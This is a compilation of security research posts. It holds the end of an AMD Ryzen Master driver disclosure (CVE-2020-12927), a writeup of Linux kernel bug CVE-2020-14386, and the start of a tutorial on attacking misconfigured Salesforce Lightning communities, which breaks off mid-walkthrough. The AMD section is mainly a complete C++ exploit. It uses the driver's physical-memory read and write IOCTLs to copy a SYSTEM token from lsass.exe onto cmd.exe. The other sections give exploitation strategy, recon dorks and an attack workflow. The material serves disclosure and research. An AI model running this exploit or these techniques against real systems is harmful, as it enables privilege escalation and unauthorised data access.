  • 18 May 2020: Vendor supplies patch, restricting driver access to Administrator group
  • 18 May 2020 — 11 July 2020: Back and forth about CVE assignment
  • 23 Aug 2020 — CVE-2020-12927 assigned
  • 13 Oct 2020 — Joint Disclosure

Exploit Proof of Concept

#include <iostream>
#include <vector>
#include <chrono>
#include <iomanip>
#include <Windows.h>
using namespace std;

#define DEVICE_NAME         "\\\\.\\AMDRyzenMasterDriverV15"
#define WRITE_IOCTL         (DWORD)0x81112F0C
#define READ_IOCTL          (DWORD)0x81112F08
#define START_ADDRESS       (INT64)0x100000000
#define STOP_ADDRESS        (INT64)0x240000000

// Creating vector of hex representation of ImageFileNames of common 
// SYSTEM processes, eg. 'wmlms.exe' = hex('exe.smlw')
vector<INT64> SYSTEM_procs = {
    //0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    //0x6578652e73736d73,         // smss.exe
    //0x7365636976726573,         // services.exe
    //0x6b6f72426d726753,         // SgrmBroker.exe
    //0x2e76736c6f6f7073,         // spoolsv.exe
    //0x6e6f676f6c6e6977,         // winlogon.exe
    //0x2e74696e696e6977,         // wininit.exe
    //0x6578652e736d6c77,         // wlms.exe
};

typedef struct {
    INT64 start_address;
    DWORD num_of_bytes;
    PBYTE write_buff;
} WRITE_INPUT_BUFFER;

typedef struct {
    INT64 start_address;
    DWORD num_of_bytes;
    char receiving_buff[0x1000];
} READ_INPUT_BUFFER;

// This struct will hold the address of a "Proc" tag's page entry, 
// that Proc chunk's header size, and how far into the page the "Proc" tag is
struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};

struct SYSTEM_TOKENS {
    std::vector<INT64> token_name;
    std::vector<INT64> token_value;
} system_tokens;

INT64 cmd_token_address = 0;

HANDLE grab_handle(const char* device_name) {

    HANDLE hFile = CreateFileA(
        device_name,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        cout << "[!] Unable to grab handle to " << DEVICE_NAME << "\n";
        exit(1);
    }
    else
    {
        cout << "[>] Grabbed handle 0x" << hex
            << (INT64)hFile << "\n";

        return hFile;
    }
}

PROC_DATA read_mem(HANDLE hFile) {

    cout << "[>] Reading through RAM for Proc tags...\n";
    DWORD num_of_bytes = 0x1000;

    LPVOID output_buff = VirtualAlloc(NULL,
        0x100c,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    PROC_DATA proc_data;

    int proc_count = 0;
    INT64 iteration = 0;
    while (true) {

        INT64 start_address = START_ADDRESS + (0x1000 * iteration);
        if (start_address >= 0x240000000) {
            cout << "\n[>] Max address reached.\n";
            cout << "[>] Number of iterations: " << dec << iteration << "\n";
            return proc_data;
        }

        READ_INPUT_BUFFER input_buff = { start_address, num_of_bytes };

        DWORD bytes_ret = 0;

        //cout << "[>] User buffer allocated at: 0x" << hex << output_buff << "\n";
        //Sleep(500);

        if (DeviceIoControl(
            hFile,
            READ_IOCTL,
            &input_buff,
            0x40,
            output_buff,
            0x100c,
            &bytes_ret,
            NULL))
        {
            //cout << "[>] DeviceIoControl succeeded!\n";
        }

        iteration++;

        //DebugBreak();
        INT64 results_begin = ((INT64)output_buff + 0xc);
        for (INT64 i = 0; i < 0xF60; i = i + 0x10) {

            PINT64 proc_ptr = (PINT64)(results_begin + 0x4 + i);
            INT32 proc_val = *(PINT32)proc_ptr;

            if (proc_val == 0x636f7250) {

                for (INT64 x = 0; x < 0xA0; x = x + 0x10) {

                    PINT64 header_ptr = PINT64(results_begin + i + x);
                    INT32 header_val = *(PINT32)header_ptr;

                    if (header_val == 0x00B80003) {

                        proc_count++;
                        cout << "\r[>] Proc chunks found: " << dec <<
                            proc_count << flush;

                        INT64 temp_addr = input_buff.start_address + i;

                        // This address might not be page-aligned to 0x1000
                        // so find out how far off from a multiple of 
                        // 0x1000 we are. This value is stored in our 
                        // PROC_DATA struct in the page_entry_offset
                        // member.
                        INT64 modulus = temp_addr % 0x1000;
                        proc_data.page_entry_offset.push_back(modulus);

                        // This is the page-aligned address where, either
                        // small or large paged memory will hold our "Proc"
                        // chunk. We store this as our proc_address member
                        // in PROC_DATA.
                        INT64 page_address = temp_addr - modulus;
                        proc_data.proc_address.push_back(
                            page_address);
                        proc_data.header_size.push_back(x);
                    }
                }
            }
        }
    }
}

void parse_procs(PROC_DATA proc_data, HANDLE hFile) {

    int system_token_count = 0;
    DWORD bytes_ret = 0;
    DWORD num_of_bytes = 0x1000;

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x100c,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    for (int i = 0; i < proc_data.header_size.size(); i++) {

        INT64 start_address = proc_data.proc_address[i];
        READ_INPUT_BUFFER input_buff = { start_address, num_of_bytes };

        if (DeviceIoControl(
            hFile,
            READ_IOCTL,
            &input_buff,
            0x40,
            output_buff,
            0x100c,
            &bytes_ret,
            NULL))
        {
            //cout << "[>] DeviceIoControl succeeded!\n";
        }

        INT64 results_begin = ((INT64)output_buff + 0xc);

        INT64 imagename_address = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x450; //ImageFileName
        INT64 imagename_value = *(PINT64)imagename_address;

        INT64 proc_token_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x360; //Token
        INT64 proc_token = *(PINT64)proc_token_addr;

        INT64 pid_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x2e8; //UniqueProcessId
        INT64 pid_value = *(PINT64)pid_addr;

        int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
            imagename_value);

        if (sys_result != 0) {

            system_token_count++;
            system_tokens.token_name.push_back(imagename_value);
            system_tokens.token_value.push_back(proc_token);
        }

        if (imagename_value == 0x6578652e646d63) {
            //cout << "[>] cmd.exe found!\n";
            cmd_token_address = (start_address + proc_data.header_size[i] +
                proc_data.page_entry_offset[i] + 0x360);
        }
    }

    if (system_tokens.token_name.size() != 0 and cmd_token_address != 0) {
        cout << "\n[>] cmd.exe and SYSTEM token information found!\n";
        cout << "[>] Let's swap tokens!\n";
    }
    else if (cmd_token_address == 0) {
        cout << "[!] No cmd.exe token address found, exiting...\n";
        exit(1);
    }
}

void write(HANDLE hFile) {

    DWORD modulus = cmd_token_address % 0x1000;
    INT64 cmd_page = cmd_token_address - modulus;
    DWORD bytes_ret = 0x0;
    DWORD read_num_bytes = modulus;

    PBYTE output_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0xc,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    READ_INPUT_BUFFER input_buff = { cmd_page, read_num_bytes };

    if (!DeviceIoControl(
        hFile,
        READ_IOCTL,
        &input_buff,
        0x40,
        output_buff,
        modulus + 0xc,
        &bytes_ret,
        NULL))
    {
        cout << "[!] Failed the read operation to copy the cmd.exe page...\n";
        cout << "[!] Last error: " << hex << GetLastError() << "\n";
        exit(1);
    }

    PBYTE results = (PBYTE)((INT64)output_buff + 0xc);

    PBYTE cmd_page_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
   

    DWORD num_of_bytes = modulus + 0x8;

    INT64 start_address = cmd_token_address;
    cout << "[>] cmd.exe token located at: " << hex << start_address << "\n";
    INT64 new_token_val = system_tokens.token_value[0];
    cout << "[>] Overwriting token with value: " << hex << new_token_val << "\n";

    memcpy(cmd_page_buff, results, modulus);
    memcpy(cmd_page_buff + modulus, (void*)&new_token_val, 0x8);

    // PhysicalAddress
    // NumberOfBytes
    // Buffer to be copied into system space
    BYTE input[0x1000] = { 0 };
    memcpy(input, (void*)&cmd_page, 0x8);
    memcpy(input + 0x8, (void*)&num_of_bytes, 0x4);
    memcpy(input + 0xc, cmd_page_buff, modulus + 0x8);

    if (DeviceIoControl(
        hFile,
        WRITE_IOCTL,
        input,
        modulus + 0x8 + 0xc,
        NULL,
        0,
        &bytes_ret,
        NULL))
    {
        cout << "[>] Write operation succeeded, you should be nt authority/system\n";
    }
    else {
        cout << "[!] Write operation failed, exiting...\n";
        exit(1);
    }
}

int main()
{
    srand((unsigned)time(0));
    HANDLE hFile = grab_handle(DEVICE_NAME);

    PROC_DATA proc_data = read_mem(hFile);

    cout << "\n[>] Parsing procs...\n";
    parse_procs(proc_data, hFile);

    write(hFile);
}

 

CVE-2020-14386: Privilege Escalation Vulnerability in the Linux kernel

CVE-2020-14386: Privilege Escalation Vulnerability in the Linux kernel

Original text by Or Cohen

Executive Summary

Lately, I’ve been investing time into auditing packet sockets source code in the Linux kernel. This led me to the discovery of CVE-2020-14386, a memory corruption vulnerability in the Linux kernel. Such a vulnerability can be used to escalate privileges from an unprivileged user into the root user on a Linux system. In this blog, I will provide a technical walkthrough of the vulnerability, how it can be exploited and how Palo Alto Networks customers are protected.

A few years ago, several vulnerabilities were discovered in packet sockets (CVE-2017-7308 and CVE-2016-8655), and there are some publications, such as this one in the Project Zero blog and this in Openwall, which give some overview of the main functionality.

Specifically, in order for the vulnerability to be triggerable, we need the kernel to have AF_PACKET sockets enabled (CONFIG_PACKET=y) and the CAP_NET_RAW privilege for the triggering process, which can be obtained in an unprivileged user namespace if user namespaces are enabled (CONFIG_USER_NS=y) and accessible to unprivileged users. Surprisingly, this long list of constraints is satisfied by default in some distributions, like Ubuntu.

Palo Alto Networks Cortex XDR customers can prevent this bug with a combination of the Behavioral Threat Protection (BTP) feature and Local Privilege Escalation Protection module, which monitor malicious behaviors across a sequence of events, and immediately terminate the attack when it is detected.

Technical Details

(All of the code figures on this section are from the 5.7 kernel sources.)

Due to the fact that the implementation of AF_PACKET sockets was covered in-depth in the Project Zero blog, I will omit some details that were already described in that article (such as the relation between frames and blocks) and go directly into describing the vulnerability and its root cause.

The bug stems from an arithmetic issue that leads to memory corruption. The issue lies in the tpacket_rcv function, located in (net/packet/af_packet.c) .

The arithmetic bug was introduced on July 19, 2008, in the commit 8913336 (“packet: add PACKET_RESERVE sockopt”). However, it became triggerable for memory corruption only in February 2016, in the commit 58d19b19cd99 (“packet: vnet_hdr support for tpacket_rcv“). There were some attempts to fix it, such as commit bcc536 (“net/packet: fix overflow in check for tp_reserve”) in May 2017 and commit edb58be (“packet: Don’t write vnet header beyond end of buffer”) in August 2017. However, those fixes were not enough to prevent memory corruption.

Let’s first have a look at the PACKET_RESERVE option:In order to trigger the vulnerability, a raw socket (AF_PACKET domain, SOCK_RAW type ) has to be created with a TPACKET_V2 ring buffer and a specific value for the PACKET_RESERVE option.

PACKET_RESERVE (with PACKET_RX_RING) - By default, a packet receive ring writes packets immediately following the metadata structure and alignment padding. This integer option reserves additional headroom.
(from https://man7.org/linux/man-pages/man7/packet.7.html)

The headroom that is mentioned in the manual is simply a buffer with size specified by the user, which will be allocated before the actual data of every packet received on the ring buffer. This value can be set from user-space via the setsockopt system call.

case PACKET_RESERVE:{unsigned int val;if (optlen != sizeof(val))return -EINVAL;if (copy_from_user(&val, optval, sizeof(val)))return -EFAULT;if (val > INT_MAX)return -EINVAL;lock_sock(sk);if (po->rx_ring.pg_vec || po->tx_ring.pg_vec) {ret = -EBUSY;} else {po->tp_reserve = val;ret = 0;}release_sock(sk);return ret;}

Figure 1. Implementation of setsockopt – PACKET_RESERVE

As we can see in Figure 1, initially, there is a check that the value is smaller than INT_MAX. This check was added in this patch to prevent an overflow in the calculation of the minimum frame size in packet_set_ringLater, it’s verified that pages were not allocated for the receive/transmit ring buffer. This is done to prevent inconsistency between the tp_reserve field and the ring buffer itself.

After setting the value of tp_reserve, we can trigger allocation of the ring buffer itself via the setsockopt system call with optname of PACKET_RX_RING:

Create a memory-mapped ring buffer for asynchronous packet reception.

Figure 2. From manual packet – PACKET_RX_RING option.

This is implemented in the packet_set_ring functionInitially, before the ring buffer is allocated, there are several arithmetic checks on the tpacket_req structure received from user-space:

min_frame_size = po->tp_hdrlen + po->tp_reserve;……if (unlikely(req->tp_frame_size < min_frame_size))goto out;

Figure 3. Part of the sanity checks in the packet_set_ring function.

As we can see in Figure 3, first, the minimum frame size is calculated, and then it is verified versus the value received from user-space. This check ensures that there is space in each frame for the tpacket header structure (for its corresponding version) and tp_reserve number of bytes.

Later, after doing all the sanity checks, the ring buffer itself is allocated via a call to alloc_pg_vec:

order = get_order(req->tp_block_size);pg_vec = alloc_pg_vec(req, order);

Figure 4. Calling the ring buffer allocation function in the packet_set_ring function.

As we can see from the figure above, the block size is controlled from user-space. The alloc_pg_vec function allocates the pg_vec array and then allocates each block via the alloc_one_pg_vec_page function:

static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order){unsigned int block_nr = req->tp_block_nr;struct pgv *pg_vec;int i;pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);if (unlikely(!pg_vec))goto out;for (i = 0; i < block_nr; i++) {pg_vec[i].buffer = alloc_one_pg_vec_page(order);

Figure 5. alloc_pg_vec implementation.

The alloc_one_pg_vec_page function uses __get_free_pages in order to allocate the block pages:

static char *alloc_one_pg_vec_page(unsigned long order){char *buffer;gfp_t gfp_flags = GFP_KERNEL | __GFP_COMP |__GFP_ZERO | __GFP_NOWARN | __GFP_NORETRY;buffer = (char *) __get_free_pages(gfp_flags, order);if (buffer)return buffer;

Figure 6. alloc_one_pg_vec_page implementation.

After the blocks allocation, the pg_vec array is saved in the packet_ring_buffer structure embedded in the packet_sock structure representing the socket.

When a packet is received on the interface, the socket bound to the tpacket_rcv function will be called and the packet data, along with the TPACKET metadata, will be written into the ring buffer. In a real application, such as tcpdump, this buffer is mmap’d to the user-space and packet data can be read from it.

The Bug

Now let’s dive into the implementation of the tpacket_rcv function (Figure 7). First, skb_network_offset is called in order to extract the offset of the network header in the received packet into maclen. In our case, this size is 14 bytes, which is the size of an ethernet header. After that, netoff (which represents the offset of the network header in the frame) is calculated, taking into account the TPACKET header (fixed per version), the maclen and the tp_reserve value (controlled by the user).

However, this calculation can overflow, as the type of tp_reserve is unsigned int and the type of netoff is unsigned short, and the only constraint (as we saw earlier) on the value of tp_reserve is to be smaller than INT_MAX.

if (sk->sk_type == SOCK_DGRAM) {…else {unsigned int maclen = skb_network_offset(skb);netoff = TPACKET_ALIGN(po->tp_hdrlen +(maclen < 16 ? 16 : maclen)) +po->tp_reserve;if (po->has_vnet_hdr) {netoff += sizeof(struct virtio_net_hdr);do_vnet = true;}macoff = netoff – maclen;}

Figure 7. The arithmetic calculation in tpacket_rcv

Also shown in Figure 7, if the PACKET_VNET_HDR option is set on the socket, sizeof(struct virtio_net_hdr) is added to it in order to account for the virtio_net_hdr structure, which should be right beyond the ethernet header. And finally, the offset of the ethernet header is calculated and saved into macoff.

Later in that function, seen in Figure 8 below, the virtio_net_hdr structure is written into the ring buffer using the virtio_net_hdr_from_skb function. In Figure 8, h.raw points into the currently free frame in the ring buffer (which was allocated in alloc_pg_vec).

if (do_vnet &&virtio_net_hdr_from_skb(skb, h.raw + macoff –sizeof(struct virtio_net_hdr),vio_le(), true, 0))goto drop_n_account;

Figure 8. Call to virtio_net_hdr_from_skb function in tpacket_rcv

Initially, I thought it might be possible to use the overflow in order to make netoff a small value, so macoff could receive a larger value (from the underflow) than the size of a block and write beyond the bounds of the buffer.

However, this is prevented by the following check:

if (po->tp_version <= TPACKET_V2) {if (macoff + snaplen > po->rx_ring.frame_size) {……snaplen = po->rx_ring.frame_size – macoff;if ((int)snaplen < 0) {snaplen = 0;do_vnet = false;}}

Figure 9. Another arithmetic check in the tpacket_rcv function.

This check is not sufficient to prevent memory corruption, as we can still make macoff a small integer value by overflowing netoff. Specifically, we can make macoff smaller than sizeof(struct virtio_net_hdr), which is 10 bytes, and write behind the bounds of the buffer using virtio_net_hdr_from_skb.

The Primitive

By controlling the value of macoff, we can initialize the virtio_net_hdr structure in a controlled offset of up to 10 bytes behind the ring buffer. The virtio_net_hdr_from_skb function starts by zeroing out the entire struct and then initializing some fields within the struct based on the skb structure.

static inline int virtio_net_hdr_from_skb(const struct sk_buff *skb,struct virtio_net_hdr *hdr,bool little_endian,bool has_data_valid,int vlan_hlen){memset(hdr, 0, sizeof(*hdr)); /* no info leak */if (skb_is_gso(skb)) {…if (skb->ip_summed == CHECKSUM_PARTIAL) {…

Figure 10. Implementation of the virtio_net_hdr_from_skb function.

However, we can set up the skb so only zeros will be written into the structure. This leaves us with the ability to zero 1-10 bytes behind a __get_free_pages allocation. Without doing any heap manipulation tactics, an immediate kernel crash will occur.

POC

A POC code for triggering the vulnerability can be found in the following Openwall thread.

Patch

I submitted the following patch in order to fix the bug.

The code shown represents the author's proposed patch for CVE-2020-14386.

Figure 11. My proposed patch for the bug.

The idea is that if we change the type of netoff from unsigned short to unsigned int, we can check whether it exceeds USHRT_MAX, and if so, drop the packet and prevent further processing.

Idea for Exploitation

Our idea for exploitation is to convert the primitive to a use-after-free. For this, we thought about decrementing a reference count of some object. For example, if an object has a refcount value of 0x10001, the corruption would look as follows:

This illustrates the process of zeroing out a byte in an object refcount, exploiting CVE-2020-14386. It shows the appearance before corruption, with an example refcount value of 0x10001, and after corruption, when the refcount = 0x1.

Figure 12. Zeroing out a byte in an object refcount.

As we can see in Figure 13 below, after corruption, the refcount will have a value of 0x1, so after releasing one reference, the object will be freed.

However, in order to make this happen, the following constraints have to be satisfied:

  • The refcount has to be located in the last 1-10 bytes of the object.
  • We need to be able to allocate the object at the end of a page.
    • This is because get_free_pages returns a page-aligned address.

We used some grep expressions along with some manual analysis of code, and we came out with the following object:

struct sctp_shared_key {struct list_head key_list;struct sctp_auth_bytes *key;refcount_t refcnt;__u16 key_id;__u8 deactivated;};

Figure 13. Definition of the sctp_shared_key structure.

It seems like this object satisfies our constraints:

  • We can create an sctp server and a client from an unprivileged user context.
    • Specifically, the object is allocated in the sctp_auth_shkey_create function.
  • We can allocate the object at the end of a page.
    • The size of the object is 32 bytes and it is allocated via kmalloc. This means the object is allocated in the kmalloc-32 cache.
    • We were able to verify that we can allocate a kmalloc-32 slab cache page behind our get_free_pages allocation. So we will be able to corrupt the last object in that slab cache page.
      • Because of the reason 4096 % 32 = 0, there is no spare space in the end of the slab page, and the last object is allocated right behind our allocation. Other slab cache sizes may not be good for us, such as 96 bytes, because 4096 % 96 != 0.
  • We can corrupt the highest 2 bytes of the refcnt field.
    • After compilation, the size of key_id and deactivated is 4 bytes each.
    • If we use the bug to corrupt 9-10 bytes, we will corrupt the 1-2 most significant bytes of the refcnt field.

Conclusion

I was surprised that such simple arithmetic security issues still exist in the Linux kernel and haven’t been previously discovered. Also, unprivileged user namespaces expose a huge attack surface for local privilege escalation, so distributions should consider whether they should enable them or not.

Palo Alto Networks Cortex XDR stops threats on endpoints and coordinates enforcement with network and cloud security to prevent successful cyber attacks. To prevent the exploitation of this bug, the Behavioral Threat Protection (BTP) feature and Local Privilege Escalation Protection module in Cortex XDR would monitor malicious behaviors across a sequence of events and immediately terminate the attack when detected.

Salesforce Lightning — An in-depth look at exploitation vectors for the everyday community

Salesforce Lightning - An in-depth look at exploitation vectors for the everyday community

Original text by Aaron Costello

Introduction

The purpose of this tutorial is to share my knowledge of exploiting common misconfigurations found in the popular CRM, Salesforce Lightning. As of current there is no public documentation on the attacker perspective. This article is not yet conclusive on the topic, a small number of specific vectors of attack are not discussed (eg: blind SOQL injection) nor are all default controller methods that can be taken advantage of as an attacker. It will hopefully, however, provide sufficient knowledge to begin exploiting these pitfalls.

There are plenty of resources for code samples within the developer documentation already, and more than enough VDPs/BBPs to satisfy a thirst to begin applying your newfound knowledge immediately. However, I will walk through creating your own developer instance which will both assist in grasping the concepts outlined here and also how it can be used to assist in attacking other Salesforce Lightning instances. This isn’t mandatory for exploitation, but helpful.

Temporary and unrelated note: I am currently searching for a security engineer / offensive security position (remote ideally, from Ireland but timezone flexible). If your company, or one you know of, is hiring within these parameters, I’d love to know more (Twitter DM is perfect).

What is Salesforce Lightning?

Simply put, it’s a bundle of frameworks providing tech for UI, CSS/Styling , but most importantly applications and components. It’s ideally used for Customer Relationship Management (CRM), and as such the vast majority of encounters will be for support sites whether it’s for the everyday user of a product or privately for partners. Think support case filing, articles, topic discussions etc et al. The developer addition is free to try out, which I highly recommend and will outline in the next subsection.

Creating your own Salesforce Developer (Community) Instance

The creation of your own instance is entirely optional. However in terms of exploitation, you will require a ‘template’ request, which is a HTTP request made to a specific Lightning endpoint that you will be utilising against other hosts. Most public Salesforce instances make these requests, so it’s not completely necessary to have your own. But if you have a desire to really grasp the information in this article (and potentially find even more useful queries that can be used in conjunction with exploitation) then I’d suggest doing so.

Creation of an instance is simple:

  1. Navigate to this link and sign up
  2. Authenticate to the instance
  3. Search ‘Communities’ in the Quick Find bar and click ‘Communities Settings’
  4. Domain Name > Enter a subdomain prefix
  5. Click ‘Save’
  6. Click ‘New community’ and select a template.
  7. Click ‘Get Started’. Provide a name and URL suffix
  8. Click ‘Create’
  9. On the Workspace page, click the ‘Builder’ button under the ‘My Workspaces’ heading
  10. On the top right, click the ‘Publish’ button in order to make the community fully public. Navigating to the link in your email will show you your public community site!
site.PNG

Key Terms

Throughout this article there will be several new concepts to understand, brief familiarity with basic DB structures is of help.

  • Objects — Effectively acting like database tables
    • Default Object — These are objects provided by Salesforce when the app is created for the first time.
    • Custom Object — These are objects created by admins. The ‘__c’ suffix denotes custom objects and fields.
  • Fields — Can be considered the ‘columns’ of a database. A small set of examples of fields in the ‘User’ object are: AboutMe, CompanyName, CommunityNickname.
  • Records — These are the ‘rows’ of a database (the actual entries of data).
  • SOQL — Salesforce Object Query Language
  • Component — Framework for app development, used for customization of a Salesforce app. It includes the view (markup) and controller (JS) on the client-side, then controller (apex) and database on the server side. Default lightning components for example are ui, aura, and force.
  • Namespace — Think of it like a package, which groups related components together.
  • Descriptor — A reference to a component in the form ‘namespace:component’. For example, ‘force:outputField’ is a descriptor for the ‘outputField’ component in the ‘force’ namespace.

How does Salesforce Lightning implement security?

Prior to going through the exploitation process, it’s imperative to understand the pitfalls of security controls in order to better understand how they are exploited, and also how to ensure your application is as watertight as possible.

From an attacker perspective, the main security controls to be concerned with essentially boil down to the following:

  • Object Level Security (OLS) — This is often referred to as CRUD within Salesforce documentation
  • Field Level Security (FLS)
  • Record Level Security (RLS)

Objects and OLS

Interested in storing data from a customer case? The Case object would be a good idea. New user registered? User object makes sense. I think you get the gist.

OLS allows an admin to completely deny access to an object from an entire profile. As such they have the ability to control who sees what. This makes complete sense, as a sales profile will not need to see the same objects as someone in customer support, and they wouldn’t even know the objects exist.

Object permissions can be modified per User Profile via the Profile tab of the Salesforce instance:

  • Users > Profiles > Select a profile > Click ‘All Object Settings’ > Select an Object -> Click ‘Edit’
example_object_permissions.PNG

Fields and FLS

FLS (field-level security) provides the option to allow specific users to have access to some ‘columns’ and not others. For example, a support site with public discussion would make sense to allow a Guest user to see the CommunityNickname from the User object as it would be shown on posts. However, there is no need to allow Guest users to be able to access the real FirstName and LastName of these users.

Salesforce has implemented some unique access rules to specific objects’ fields, such as the User object. Instances of this are outlined in the object reference documentation.

Access permissions to specific fields in an object can be modified on the same page as that for Object permissions, so following the steps in the previous section will reveal the field permissions when you scroll down.

field_perms.PNG

Records and RLS

Lastly, are the records which contain the actual data. Ultimately this is where the interesting and sensitive information lies, as it’s nice to know that a ‘Sensitive_Data__c’ field exists in a custom object but it’s effectively useless if you can only see your own accounts record. This is the concept of RLS and it’s extremely common considering a person should absolutely have access to their own data and not necessarily others.

RLS can be implemented in tiers:

  • Organization settings — default level of access everyone has to specific records
  • Role settings — does the case owner role need more access than regular portal user role to records? This is where that can be done at a hierarchy level.
  • Sharing rules — exceptions to organization settings for particular sets of users, not necessarily entire roles.
  • Manual sharing settings — want to give every user in a set except Tom access to more record data? Look no further.
  • Apex managed sharing — Like manual sharing, but done programmatically via Apex or SOAP

Typically, this is done from the top down to allow for finer tuning. Where to find most of these options is outlined briefly below:

Organization wide sharing settings: Navigate to ‘/lightning/setup/SecuritySharing/home’. Sharing rules may also be configured further down this page.

orgsharing.PNG

Roles and role hierarchy: Navigate to ‘/lightning/setup/Roles/home’ > Click ‘Set Up Roles’:

roles.PNG

Manual sharing: Navigate to Setup > Users > Click on a user > Click ‘Sharing’ > click ‘Add’:

manual sharing.PNG

I recommend reading the following document to understand exactly different levels of permissions will grant: https://trailhead.salesforce.com/content/learn/modules/data_security/data_security_records

Caveat

Seems simple right? Salesforce not only provides community alerts for the most glaring issues which scream at you every time you login in your dashboard, but 99% of the above can be done visually through a GUI. I mean, look at this example of removing the ‘View All Users’ permissions for Guest profiles:

guest_profiles.png

There’s also continuous default security improvements for newer orgs with season patches.

Not so fast. Surprisingly many organisations fail to notice community alerts or they may simply have been older orgs which have been created prior to these new patches and have just no gotten around to reading the latest security notes. Not only that, but custom objects are rarely configured with the correct OLS/FLS/RLS.

But, it’s not all nice buttons and fancy GUIs for the developers who want to implement custom blueprints and code for unique functionality. Which brings us on to the next topic, Apex Classes and SOQL.

Apex Classes and Methods

“Apex is a strongly typed, object-oriented programming language that allows developers to execute flow and transaction control statements on the Lightning platform server in conjunction with calls to the Lightning Platform API. Using syntax that looks like Java and acts like database stored procedures, Apex enables developers to add business logic to most system events, including button clicks, related record updates, and Visualforce pages. Apex code can be initiated by Web service requests and from triggers on objects.”

— Salesforce Documentation

The above statement gives a general understanding of what Apex is, but what we’re interested in is how it implements security, and how can we interact with the code created by developers?

The Apex classes that have methods which are denoted with «@AuraEnabled» are what interest us the most, as these methods can be called remotely through the Aura endpoint so they are ‘reachable’. My personal favourite thing about exploiting Apex is that it’s not exactly secure by design. User permission checks / FLS/ RLS are not implemented by default, as it runs entirely in the system context as opposed to user context.

Salesforce have provided some nice examples of vulnerable Apex class methods within their developer documentation. Below will summarise briefly how security may be implemented at a base level:

  • Classes should be declared using ‘with sharing’ to run in user context
  • In the case of CRUD and FLS:
    • Check read permissions using ‘.isAccessible()’
    • Check update permissions using ‘.isUpdateable()’
    • Check delete permissions using ‘.isDeletable()’
    • Check create permissions using …. guess? 😉
  • SOQL Injection:
    • Binding variables and static queries, and using ‘WITH SECURITY_ENFORCED’

Unfortunately without access to the code itself, exploitation of apex class methods will always be done blackbox unless the class is open source (which is always worth checking). As such, it’s important to be smart about it. Ask yourself the following:

  • Do I have to blindly test this? Perhaps I can crawl the site functionality and a call to the method will be performed at some point. In which case, you now have perfectly formatted data to play around with.
  • Once you peek at the definition (explanation on how to do that later), what are the parameter names hinting at and what variable types are they expecting? A method called ‘updateProfile’ with parameters ‘recordId’ (type aura://Id) and ‘profileName’ (type aura://String) hints massively at what data you should be plugging in. It’s only a matter of getting a profile ID to modify (either by extracting it via insecure object permissions, or perhaps profiles are publicly viewable on the site and as such so are the IDs).

Here is a small sample of issues I’ve found within apex methods:

apex1.PNG
apex2.PNG
apex3.PNG

Recon Process

Now to the exciting part, and no better way to start than actually finding sites using Salesforce. Sites hosted with SF typically point to one of the following via CNAMEs:

  • *.force.com
  • *.secure.force.com
  • *.live.siteforce.com

This can be used in conjunction with tools such as SecurityTrails which allow searching by DNS record, or Rapid7’s collection of DNS records (fdns_any.json.gz). It’s important to note that *.live.siteforce.com will be prefixed like ‘sub.site.com.<id>.live.siteforce.com’ whereas *.force.com is trickier to spot as the full domain wont appear in the record. For example, ‘support.butchers.com’ may be hosted on ‘butchersupport.force.com’, so ensure to think of related keywords and organization names when looking through large lists of records.

The following Google dorks may also prove useful:

  • site:force.com
  • inurl:/s/topic
  • inurl:/s/login
  • inurl:/s/article
  • inurl:/s/global-search

Lastly, a crafted POST request to an aura endpoint will throw an easily finger-printable error. Feel free to use the Nuclei template below which tests for this:

id: salesforce-aura

info:
  name: Detect the exposure of Salesforce Lightning aura API
  author: aaron_costello
  severity: info

requests:
  - method: POST
    path:
      - "{{BaseURL}}/aura"
      - "{{BaseURL}}/s/sfsites/aura"
      - "{{BaseURL}}/sfsites/aura"
    body: "{}"
    matchers:
      - type: word
        words:
          - 'aura:invalidSession'
        part: body

Please keep in mind that certain communities may also have a custom $Site.Prefix value such as ‘/business’, ‘/partners’,’/support’ etc et al which will prefix the aura endpoints. Feel free to add these to the template as you find them.

Exploitation

Workflow

When it comes to the exploitation process, I go through a specific workflow in order to ensure that everything is covered. Below is a brief overview of this process. Don’t worry too much right now regarding the information that’s contained in each box, as it’ll all make sense once you’ve completed your reading of the exploitation section, and you can refer back to it.

Starting from Unauthenticated (Guest User):

  1. Pull custom object names
  2. Run intruder attack to retrieve records for objects discovered in (1) and default objects known to keep sensitive information
  3. Pull list views for any objects not returning data from (2) for the ‘Recent’ listId and attempt to extract this data directly (or, query ‘ListView’ object and bruteforce each object with the ListView records disclosed)
  4. Crawl application to enumerate potential apex class methods query-able by Guest users
  5. Attempt to exploit said methods
  6. Authenticate and repeat steps 1-5

In Practice

The first thing you’ll need to do prior to any actual hacking is to populate your headers/cookies and parameter values for ‘/aura’ (I will say /aura’, but it could be any of the endpoints mentioned in the Nuclei template and more). This is why the creation of your own developer community is useful, but feel free to use mine instead.

Navigate to the developer instance with Burp’s proxy sniffing all HTTP(S) requests in the background. Grab any POST request to an aura endpoint and send it to repeater:

aura_query.PNG

